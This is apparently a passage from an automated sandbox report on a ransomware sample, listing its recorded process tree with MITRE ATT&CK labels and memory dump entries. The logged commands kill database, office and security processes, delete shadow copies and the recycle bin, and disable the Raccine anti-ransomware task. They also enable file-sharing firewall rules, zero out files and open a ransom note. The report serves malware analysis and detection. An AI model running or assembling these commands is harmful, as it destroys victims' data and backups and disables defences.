  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:3872
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:2132
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:2088
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:1112
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  - Drops file in Windows directory
  PID:1072
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:608
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:64
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:2988
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:840
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:3644
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1148
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4060
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1356
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2120
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:508
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3572
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1392
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:700
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2412
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1872
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2776
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:380
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3860
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2092
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2460
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2060
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1172
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1216
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2524
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1416
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1756
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3940
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4072
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1944
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2864
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3692
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:3208
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2652
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1040
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:296
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1956
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1656
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:800
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2820
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:380
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:840
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:836
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1720
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1528
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3544
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3764
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4004
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1780
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3192
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:1468
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2648
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2704
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3708
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:700
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2412
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:3100
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:1040
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:1244
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:400
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_RECOVER_MY_FILES !.hta
  2⤵
  PID:3572
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:1884
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:1456
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:4080
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
  2⤵
  PID:1780
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:4092

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/64-127-0x0000000000000000-mapping.dmp

Download
memory/296-160-0x0000000000000000-mapping.dmp

Download
memory/380-165-0x0000000000000000-mapping.dmp

Download
memory/380-142-0x0000000000000000-mapping.dmp

Download
memory/420-119-0x0000000000000000-mapping.dmp

Download
memory/428-118-0x0000000000000000-mapping.dmp

Download
memory/508-135-0x0000000000000000-mapping.dmp

Download
memory/608-126-0x0000000000000000-mapping.dmp

Download
memory/700-179-0x0000000000000000-mapping.dmp

Download
memory/700-138-0x0000000000000000-mapping.dmp

Download
memory/800-162-0x0000000000000000-mapping.dmp

Download
memory/836-167-0x0000000000000000-mapping.dmp

Download
memory/840-166-0x0000000000000000-mapping.dmp

Download
memory/840-129-0x0000000000000000-mapping.dmp

Download
memory/1040-159-0x0000000000000000-mapping.dmp

Download
memory/1072-125-0x0000000000000000-mapping.dmp

Download
memory/1112-123-0x0000000000000000-mapping.dmp

Download
memory/1148-131-0x0000000000000000-mapping.dmp

Download
memory/1172-147-0x0000000000000000-mapping.dmp

Download
memory/1216-148-0x0000000000000000-mapping.dmp

Download
memory/1356-132-0x0000000000000000-mapping.dmp

Download
memory/1392-137-0x0000000000000000-mapping.dmp

Download
memory/1416-150-0x0000000000000000-mapping.dmp

Download
memory/1468-175-0x0000000000000000-mapping.dmp

Download
memory/1528-168-0x0000000000000000-mapping.dmp

Download
memory/1656-163-0x0000000000000000-mapping.dmp

Download
memory/1720-169-0x0000000000000000-mapping.dmp

Download
memory/1756-151-0x0000000000000000-mapping.dmp

Download
memory/1780-173-0x0000000000000000-mapping.dmp

Download
memory/1872-140-0x0000000000000000-mapping.dmp

Download
memory/1944-154-0x0000000000000000-mapping.dmp

Download
memory/1956-161-0x0000000000000000-mapping.dmp

Download
memory/2060-146-0x0000000000000000-mapping.dmp

Download
memory/2088-124-0x0000000000000000-mapping.dmp

Download
memory/2092-144-0x0000000000000000-mapping.dmp

Download
memory/2120-134-0x0000000000000000-mapping.dmp

Download
memory/2132-122-0x0000000000000000-mapping.dmp

Download
memory/2412-186-0x0000026525D60000-0x0000026525D62000-memory.dmp

Filesize
8KB

Download
memory/2412-139-0x0000000000000000-mapping.dmp

Download
memory/2412-182-0x0000026525D60000-0x0000026525D62000-memory.dmp

Filesize
8KB

Download
memory/2412-181-0x0000026525D60000-0x0000026525D62000-memory.dmp

Filesize
8KB

Download
memory/2412-180-0x0000000000000000-mapping.dmp

Download
memory/2412-184-0x0000026525D60000-0x0000026525D62000-memory.dmp

Filesize
8KB

Download
memory/2412-202-0x000002653FE16000-0x000002653FE18000-memory.dmp

Filesize
8KB

Download
memory/2412-201-0x0000026525D60000-0x0000026525D62000-memory.dmp

Filesize
8KB

Download
memory/2412-185-0x000002653FD70000-0x000002653FD71000-memory.dmp

Filesize
4KB

Download
memory/2412-183-0x0000026525D60000-0x0000026525D62000-memory.dmp

Filesize
8KB

Download
memory/2412-187-0x0000026525D60000-0x0000026525D62000-memory.dmp

Filesize
8KB

Download
memory/2412-188-0x000002653FFA0000-0x000002653FFA1000-memory.dmp

Filesize
4KB

Download
memory/2412-189-0x0000026525D60000-0x0000026525D62000-memory.dmp

Filesize
8KB

Download
memory/2412-191-0x000002653FE10000-0x000002653FE12000-memory.dmp

Filesize
8KB

Download
memory/2412-193-0x000002653FE13000-0x000002653FE15000-memory.dmp

Filesize
8KB

Download
memory/2460-145-0x0000000000000000-mapping.dmp

Download
memory/2524-149-0x0000000000000000-mapping.dmp

Download
memory/2648-176-0x0000000000000000-mapping.dmp

Download
memory/2652-158-0x0000000000000000-mapping.dmp

Download
memory/2704-177-0x0000000000000000-mapping.dmp

Download
memory/2776-141-0x0000000000000000-mapping.dmp

Download
memory/2820-164-0x0000000000000000-mapping.dmp

Download
memory/2864-155-0x0000000000000000-mapping.dmp

Download
memory/2988-128-0x0000000000000000-mapping.dmp

Download
memory/3100-203-0x0000000000000000-mapping.dmp

Download
memory/3140-117-0x000000001B260000-0x000000001B262000-memory.dmp

Filesize
8KB

Download
memory/3140-115-0x00000000005D0000-0x00000000005D1000-memory.dmp

Filesize
4KB

Download
memory/3192-174-0x0000000000000000-mapping.dmp

Download
memory/3208-157-0x0000000000000000-mapping.dmp

Download
memory/3544-170-0x0000000000000000-mapping.dmp

Download
memory/3572-204-0x0000020A5C348000-0x0000020A5C350000-memory.dmp

Filesize
32KB

Download
memory/3572-136-0x0000000000000000-mapping.dmp

Download
memory/3604-120-0x0000000000000000-mapping.dmp

Download
memory/3644-130-0x0000000000000000-mapping.dmp

Download
memory/3692-156-0x0000000000000000-mapping.dmp

Download
memory/3708-178-0x0000000000000000-mapping.dmp

Download
memory/3764-171-0x0000000000000000-mapping.dmp

Download
memory/3860-143-0x0000000000000000-mapping.dmp

Download
memory/3872-121-0x0000000000000000-mapping.dmp

Download
memory/3940-152-0x0000000000000000-mapping.dmp

Download
memory/4004-172-0x0000000000000000-mapping.dmp

Download
memory/4060-133-0x0000000000000000-mapping.dmp

Download
memory/4072-153-0x0000000000000000-mapping.dmp

Download